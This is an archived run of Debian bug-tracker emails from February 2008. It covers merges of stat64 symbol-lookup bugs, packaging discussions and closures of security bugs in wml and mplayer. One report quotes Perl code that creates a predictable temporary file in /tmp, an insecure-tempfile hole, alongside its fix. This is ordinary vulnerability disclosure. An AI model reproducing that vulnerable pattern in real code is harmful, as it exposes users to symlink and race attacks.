465765 465792 465839 465842 465926 465969.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 465029 to libqt3-mt, forcibly merging 465029 465028

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> reassign 465029 libqt3-mt
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#465485: virtualbox-ose: Fails to start
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Bug#465969: virtualbox-ose: stat 64 error on start
Bug reassigned from package `virtualbox-ose' to `libqt3-mt'.

> # fixed libqt3-mt will be uploaded today. merging bugs back
> forcemerge 465029 465028
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#465485: virtualbox-ose: Fails to start
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Bug#465969: virtualbox-ose: stat 64 error on start
Bug#464946: K3b crashes because of library problem
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465259: Same problem with ktorrent
Bug#465300: kcontrol: font settings not avaible
Bug#465311: k3b: fails with symbol lookup error
Bug#465407: libqt3-mt: konqueror fails to display directory tree in the 
navigation area
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465445: ktorrent fails to start with unresolved symbol error
Bug#465480: k3b always crashes when I want to burn something
Bug#465533: ktorrent: Fails to start; symbol lookup error: lstat64
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465759: ktorrent: symbol lookup error [PPC]
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465839: symbol lookup error when starting ktorrent
Bug#465842: undefined symbol: stat64 (ktorrent doesn't start)
Bug#465926: virtualbox-ose: undefined symbol: stat64
Forcibly Merged 464946 465028 465029 465046 465125 465151 465239 465259 465300 
465311 465407 465413 465445 465480 465485 465533 465602 465649 465759 465765 
465792 465839 465842 465926 465969.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465029: reassign 465029 to libqt3-mt, forcibly merging 465029 465028

2008-02-16 Thread Modestas Vainius
# Automatically generated email from bts, devscripts version 2.10.16
reassign 465029 libqt3-mt 
# fixed libqt3-mt will be uploaded today. merging bugs back
forcemerge 465029 465028




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: forcibly merging 465407 465926 465028

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> forcemerge 465407 465926 465028
Bug#465407: libqt3-mt: konqueror fails to display directory tree in the 
navigation area
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465926: virtualbox-ose: undefined symbol: stat64
Bug#464946: K3b crashes because of library problem
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465300: kcontrol: font settings not avaible
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Forcibly Merged 464946 465028 465046 465125 465300 465311 465407 465413 465480 
465602 465649 465765 465926.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 465259 to libqt3-mt, forcibly merging 465259 465028

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> reassign 465259 libqt3-mt
Bug#465259: Same problem with ktorrent
Bug#465445: ktorrent fails to start with unresolved symbol error
Bug#465533: ktorrent: Fails to start; symbol lookup error: lstat64
Bug#465759: ktorrent: symbol lookup error [PPC]
Bug#465839: symbol lookup error when starting ktorrent
Bug#465842: undefined symbol: stat64 (ktorrent doesn't start)
Bug reassigned from package `ktorrent' to `libqt3-mt'.

> forcemerge 465259 465028
Bug#465259: Same problem with ktorrent
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465445: ktorrent fails to start with unresolved symbol error
Bug#465533: ktorrent: Fails to start; symbol lookup error: lstat64
Bug#465759: ktorrent: symbol lookup error [PPC]
Bug#465839: symbol lookup error when starting ktorrent
Bug#465842: undefined symbol: stat64 (ktorrent doesn't start)
Bug#464946: K3b crashes because of library problem
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465300: kcontrol: font settings not avaible
Bug#465311: k3b: fails with symbol lookup error
Bug#465407: libqt3-mt: konqueror fails to display directory tree in the 
navigation area
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465926: virtualbox-ose: undefined symbol: stat64
Forcibly Merged 464946 465028 465046 465125 465259 465300 465311 465407 465413 
465445 465480 465533 465602 465649 465759 465765 465839 465842 465926.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 465300 to libqt3-mt, severity of 465300 is serious, forcibly merging 465300 465028

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> reassign 465300 libqt3-mt
Bug#465300: kcontrol: font settings not avaible
Bug reassigned from package `libqt3-mt' to `libqt3-mt'.

> severity 465300 serious
Bug#465300: kcontrol: font settings not avaible
Severity set to `serious' from `normal'

> forcemerge 465300 465028
Bug#465300: kcontrol: font settings not avaible
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#464946: K3b crashes because of library problem
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Forcibly Merged 464946 465028 465046 465125 465300 465311 465413 465480 465602 
465649 465765.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#460695: alpine: uw-mailutils already ships mailutil

2008-02-16 Thread Jonas Smedegaard
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Feb 15, 2008 at 04:11:35PM -0800, Asheesh Laroia wrote:
> On Sat, 9 Feb 2008, Marc Glisse wrote:
>
>> Asheesh Laroia:
>>
>>> Ssince uw-imap and alpine are separately released source bundles 
>>> from washington.edu, it seems like it'd be easiest to have them 
>>> remain separate source packages.
>>
>> uw-imap also appears as the imap subdirectory of the alpine 
>> distribution, so they can't really be considered as different sources 
>> (there is an inclusion).
>>
>> Now it can still make sense to keep them separate: it is nice to have 
>> a version of alpine that is as up to date as possible, whereas the 
>> imap server (and others) may require more reliability (and thus 
>> stability).
>
> That's right.
>
>> Your choice.

I never proposed to merge the sources in any way. I proposed to work 
together on both of them - keeping them as separate sources and 
packaging them as separate sets of packages.


> I'm happy with you maintaining the UW IMAP server separately.  The 
> important question is, probably, whose mailutil should we ship?  
> Alpine is more likely to get fruity drivers like Maildir, which Mark 
> Crispin doesn't think are high enough quality to get into the real UW 
> IMAP distribution; that seems to me to be a reason to ship the alpine 
> version.
>
> But I'm not set on that.  After all, stability in a "mailutil" might 
> be appreciated too. (-:

Maildir is a driver for the imap backend, handled by C-client.

Mark Crispin does not want to offer c-client as a shared library. That, 
I believe, is the sole reason that uw-imap is included in the source of 
alpine.

Supporting new drivers means patching the uw-imap source included with 
alpine. I believe it makes good sense to instead patch alpine the use 
the shared (Debian-patched not-approved-by-Mark Crispin) libc-client 
package and if Alpine invents additional patches for the uw-imap source 
in addition to the current Maildir patch then consider applying them to 
that shared library instead, for the benefit of php and others using it, 
in addition to Alpine.

If we find that some patches (possibly including the current Maildir 
patch) may not be stable enough to force all Debian users of uw-imap and 
other C-lient-based software, then we could maybe extend the build 
routines of uw-imap to package several flavors of th c-client library 
with different patches applied.

I have experience in handling flavored libraries with the GD library 
(built with and without Xpm support).


Kind regards,

  - Jonas

- -- 
* Jonas Smedegaard - idealist og Internet-arkitekt
* Tlf.: +45 40843136  Website: http://dr.jones.dk/

  - Enden er nær: http://www.shibumi.org/eoti.htm
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHtvOqn7DbMsAkQLgRAv6IAKCVLNHTVqDLutftR7/efo7ghZMGhwCeOFXw
XJQinFc/G6UuUI63bYWY9Q8=
=LNSI
-END PGP SIGNATURE-




Processed: Making bug visible

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> unmerge 465029
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#464946: K3b crashes because of library problem
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465485: virtualbox-ose: Fails to start
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Disconnected #465029 from all other report(s).

> unmerge 465151
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#464946: K3b crashes because of library problem
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465485: virtualbox-ose: Fails to start
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Disconnected #465151 from all other report(s).

> unmerge 465239
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#464946: K3b crashes because of library problem
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465485: virtualbox-ose: Fails to start
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Disconnected #465239 from all other report(s).

> unmerge 465485
Bug#465485: virtualbox-ose: Fails to start
Bug#464946: K3b crashes because of library problem
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Disconnected #465485 from all other report(s).

> unmerge 465792
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Bug#464946: K3b crashes because of library problem
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465311: k3b: fails with symbol lookup error
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465480: k3b always crashes when I want to burn something
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Disconnected #465792 from all other report(s).

> reassign 465029 virtualbox-ose
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug reassigned from package `libqt3-mt' to `virtualbox-ose'.

> reassign 465151 virtualbox-ose
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug reassigned from package `libqt3-mt' to `virtualbox-ose'.

> reassign 465239 virtualbox-ose
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug reassigned from package `libqt3-mt' to `virtualbox-ose'.

> 

Bug#465485: Making bug visible

2008-02-16 Thread Michael Meskes
unmerge 465029
unmerge 465151
unmerge 465239
unmerge 465485
unmerge 465792
reassign 465029 virtualbox-ose
reassign 465151 virtualbox-ose
reassign 465239 virtualbox-ose
reassign 465485 virtualbox-ose
reassign 465792 virtualbox-ose
severity 465969 serious
forcemerge 465029 465969 465151 465239 465485 465792 465969 
tag 465029 pending
thanks

I'm getting tired of seeing this bug reported over and over again
because noone would expect to find the explanation listed as libqt3-mt
bug. Also in fact this is not a libqt3-mt bug but a libc one.

On top of this a re-upload will fix it while there is no progress in a
general binNMU approach. Therefore I claim these bugs back to
virtualbox-ose. Once we finish debconf template review (supposedly
tomorrow) a new upload will come anyway, fixing all this. 

In the meantime please either recompile or keep the old 3.3.7 version of
libqt3-mt and the virtualbox-ose package will run fine.

Michael
-- 
Michael Meskes
Email: Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [EMAIL PROTECTED]
Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL!



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#464118: rm -r broken: Function not implemented

2008-02-16 Thread Jim Meyering
Jim Meyering <[EMAIL PROTECTED]> wrote:
> For the record, here's what I did:
>
> Simulate the lack of openat functions:
> ac_cv_func_openat=no ./configure && make && make check
> All tests passed.
>
> Next, pretend we don't have /proc/self/fd support either, by changing
> the openat-emulation code to use nonexistent /proc/self/FD:
>   perl -pi -e 's,/proc/self/fd,/proc/self/FD,' lib/openat-proc.c \
> tests/du/long-from-unreadable tests/rm/inaccessible
>
> That passed all tests, too, and gave the strace results that looked
> so different from yours.

Actually, Michael pointed out that your strace includes an fstatat call
(failing with ENOSYS, no less), which suggests you're using a new-enough
version.

I dug a little deeper and think I have identified the problem.  I suspect
that your system has a working openat function and that coreutils detects
it, but that your fstatat function always returns ENOSYS.

The openat module's configure-time test checks only for the existence
of the openat function.  If that test succeeds on your system, yet it
lacks fstatat, then that would explain what's happening.

To support such a system you have a choice:

  1) easy: turn off all openat support. i.e., build like this:

ac_cv_func_openat=no ./configure

  2) more work: add a configure-time test for a working fstatat, and
if it's not available, link with the replacement function that is
currently included unconditionally via the definition in openat.c.

Since this is for a kernel that is old, but not *that* old, (i.e., the
problem affects only the few kernels, that had incomplete openat support)
spending time on #2 does not seem worthwhile to me.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: block 465969 with 465413

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.13
> block 465969 with 465413
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465969: virtualbox-ose: stat 64 error on start
Was not blocked by any bugs.
Blocking bugs of 465969 added: 465413, 464946, 465028, 465029, 465046, 465125, 
465151, 465239, 465311, 465480, 465485, 465602, 465649, 465765, 465792

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466082: dante-server: after unpacking, fails to configure and run

2008-02-16 Thread Ivan Vucica
Package: dante-server
Version: 1.1.18.dfsg-0.1
Severity: grave
Justification: renders package unusable

During installation, package manages to unpack, but configuring it fails
miserably. I (obviously) made no modifications to the configuration
file.

[EMAIL PROTECTED]:~$ sudo apt-get install dante-server
[sudo] password for ivucica: 
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following NEW packages will be installed:
  dante-server
0 upgraded, 1 newly installed, 0 to remove and 5 not upgraded.
Need to get 0B/123kB of archives.
After this operation, 340kB of additional disk space will be used.
Selecting previously deselected package dante-server.
(Reading database ... 364944 files and directories currently
installed.)
Unpacking dante-server (from
.../dante-server_1.1.18.dfsg-0.1_i386.deb) ...
Setting up dante-server (1.1.18.dfsg-0.1) ...
Starting Dante SOCKS daemon: Feb 16 12:55:44 (1203162944) danted[0]:
socks_seteuid(): old: 0, new: 13
Feb 16 12:55:44 (1203162944) danted[0]: socks_reseteuid(): current:
13, new: 0
Feb 16 12:55:44 (1203162944) danted[0]: socks_seteuid(): old: 0, new:
65534
Feb 16 12:55:44 (1203162944) danted[0]: socks_reseteuid(): current:
65534, new: 0
Feb 16 12:55:44 (1203162944) danted[0]: socks_seteuid(): old: 0, new:
65534
Feb 16 12:55:44 (1203162944) danted[0]: socks_reseteuid(): current:
65534, new: 0
Feb 16 12:55:44 (1203162944) danted[0]: fixsettings(): no internal
address given
Feb 16 12:55:44 (1203162944) danted[0]: sockdexit(): terminating
invoke-rc.d: initscript danted, action "start" failed.
dpkg: error processing dante-server (--configure):
 subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
 dante-server
E: Sub-process /usr/bin/dpkg returned an error code (1)



-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (1000, 'testing'), (500, 'stable'), (101, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/1 CPU core)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages dante-server depends on:
ii  libc6 2.7-6  GNU C Library: Shared libraries
ii  libpam0g  0.99.7.1-5 Pluggable Authentication Modules l
ii  libwrap0  7.6.dbs-14 Wietse Venema's TCP wrappers libra

dante-server recommends no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#463907: marked as done (Creates tempfiles in a unsafe way)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:33 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#463907: fixed in wml 2.0.11-1etch1
has caused the Debian Bug report #463907,
regarding Creates tempfiles in a unsafe way
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
463907: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463907
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: wml
Version: 2.0.11-1
Severity: serious
Tags: security

The following code in wml_backend/p1_ipp/ipp.src is obviously unsafe
(and actually causing practical problems during the Debian website
build):

$tmpdir = $ENV{'TMPDIR'} || '/tmp';
$tmpfile = $tmpdir . "/ipp.$$.tmp";
unlink($tmpfile);
$tmp = new IO::File;
$tmp->open(">$tmpfile") || error("cannot write into $tmpfile: $!");

Sadly enough this was fixed by the former maintainer for sarge but
apparently got lost when the new upstream was packaged for etch. See
the following code in sarge's version:

my $tmpldir = ($ENV{'TMPDIR'} || '/tmp') . '/ipp.XX';
$tmpdir = mkdtemp($tmpldir) or die "Unable to create temporary directory: $!\n";
$tmpfile = $tmpdir . "/ipp.$$.tmp";
unlink($tmpfile);
$tmp = new IO::File;
$tmp->open(">$tmpfile") || error("cannot write into $tmpfile: $!");

You could probably just use that again.

Gruesse,
Frank Lichtenheld

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (900, 'unstable'), (900, 'testing'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.23-1-686 (SMP w/2 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages wml depends on:
ii  eperl 2.2.14-15  Embedded Perl 5 Language
ii  iselect   1.3.1-3An interactive line selection tool
ii  libbit-vector-perl6.4-7  Perl and C library for bit vectors
ii  libc6 2.7-6  GNU C Library: Shared libraries
ii  libimage-size-perl3.1-3  determine the size of images in se
ii  libpng12-01.2.15~beta5-3 PNG library - runtime
ii  libterm-readkey-perl  2.30-3 A perl module for simple terminal 
ii  m41.4.10-1   a macro processing language
ii  mp4h  1.3.1-4Macro processor for HTML documents
ii  perl  5.8.8-12   Larry Wall's Practical Extraction 
ii  perl-base [perlapi-5.8.8] 5.8.8-12   The Pathologically Eclectic Rubbis
ii  slice 1.3.8-9Extract out pre-defined slices of 

Versions of packages wml recommends:
ii  libhtml-clean-perl 0.8-10Cleans up HTML code for web browse
ii  linklint   2.3.5-5   A fast link checker and web site m
ii  tidy   20080116cvs-2 HTML syntax checker and reformatte
ii  txt2html   2.50-2Text to HTML converter

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: wml
Source-Version: 2.0.11-1etch1

We believe that the bug you reported is fixed in the latest version of
wml, which is due to be installed in the Debian FTP archive:

wml_2.0.11-1etch1.diff.gz
  to pool/main/w/wml/wml_2.0.11-1etch1.diff.gz
wml_2.0.11-1etch1.dsc
  to pool/main/w/wml/wml_2.0.11-1etch1.dsc
wml_2.0.11-1etch1_i386.deb
  to pool/main/w/wml/wml_2.0.11-1etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Frank Lichtenheld <[EMAIL PROTECTED]> (supplier of updated wml package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri, 08 Feb 2008 23:11:21 +0100
Source: wml
Binary: wml
Architecture: source i386
Version: 2.0.11-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Frank Lichtenheld <[EMAIL PROTECTED]>
Changed-By: Frank Lichtenheld <[EMAIL PROTECTED]>
Description: 
 wml- off-line HTML generation toolkit
Closes: 463907
Changes: 
 wml (2.0.11-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by security team.
   * CVE-2008-0665, CVE-2008-0666:
 Fix insecure temporary file creations in eperl and ipp
 

Bug#464532: marked as done (mplayer: CVE-2008-0630 buffer overflow via crafted url)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:21 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#464532: fixed in mplayer 1.0~rc1-12etch2
has caused the Debian Bug report #464532,
regarding mplayer: CVE-2008-0630 buffer overflow via crafted url
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464532: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464532
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Source: mplayer
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for mplayer.

CVE-2008-0630[0]:
| Buffer overflow in url.c in MPlayer 1.0rc2 and SVN before r25823
| allows remote attackers to execute arbitrary code via a crafted URL
| that prevents the IPv6 parsing code from setting a pointer to NULL,
| which causes the buffer to be reused by the unescape code.

You can find a patch for this on:
http://svn.mplayerhq.hu/mplayer/trunk/stream/stream_cddb.c?r1=25820&r2=25824

If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0630

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpcbN1vaiTrB.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: mplayer
Source-Version: 1.0~rc1-12etch2

We believe that the bug you reported is fixed in the latest version of
mplayer, which is due to be installed in the Debian FTP archive:

mplayer-doc_1.0~rc1-12etch2_all.deb
  to pool/main/m/mplayer/mplayer-doc_1.0~rc1-12etch2_all.deb
mplayer_1.0~rc1-12etch2.diff.gz
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.diff.gz
mplayer_1.0~rc1-12etch2.dsc
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.dsc
mplayer_1.0~rc1-12etch2_i386.deb
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
A Mennucc1 <[EMAIL PROTECTED]> (supplier of updated mplayer package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri,  8 Feb 2008 20:32:41 +0100
Source: mplayer
Binary: mplayer-doc mplayer
Architecture: source i386 all
Version: 1.0~rc1-12etch2
Distribution: stable-security
Urgency: high
Maintainer: A Mennucc1 <[EMAIL PROTECTED]>
Changed-By: A Mennucc1 <[EMAIL PROTECTED]>
Description: 
 mplayer- The Movie Player
 mplayer-doc - documentation for MPlayer
Closes: 464060 464532 464533
Changes: 
 mplayer (1.0~rc1-12etch2) stable-security; urgency=high
 .
   * fix SVN25823 for
 CVE-2008-0630, buffer overflow via crafted url ,
 thanks Niko Golde (closes: #464532)
   * fix SVN25824 for
 CVE-2008-0629, buffer overflow via crafted cddb title
 thanks Niko Golde (closes: #464533)
   * fix for CVE-2008-0485 Array index error in libmpdemux/demux_mov.c
 a.k.a.  CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability
 thanks Stefan Fritsch
   * fix for CVE-2008-0486 Array index vulnerability in libmpdemux/demux_audio.c
 a.k.a.  CORE-2008-0122: MPlayer arbitrary pointer dereference
 thanks Stefan Fritsch (closes: #464060)
Files: 
 e247c07b25f52ae90c66d1147ed2dad3 1265 graphics optional 
mplayer_1.0~rc1-12etch2.dsc
 4fbe0a18dad58eb0fde6388bfa0fd6fe 82320 graphics optional 
mplayer_1.0~rc1-12etch2.diff.gz
 dcae457fc598d095481ae958b4b2be33 2042982 graphics optional 
mplayer-doc_1.0~rc1-12etch2_all.deb
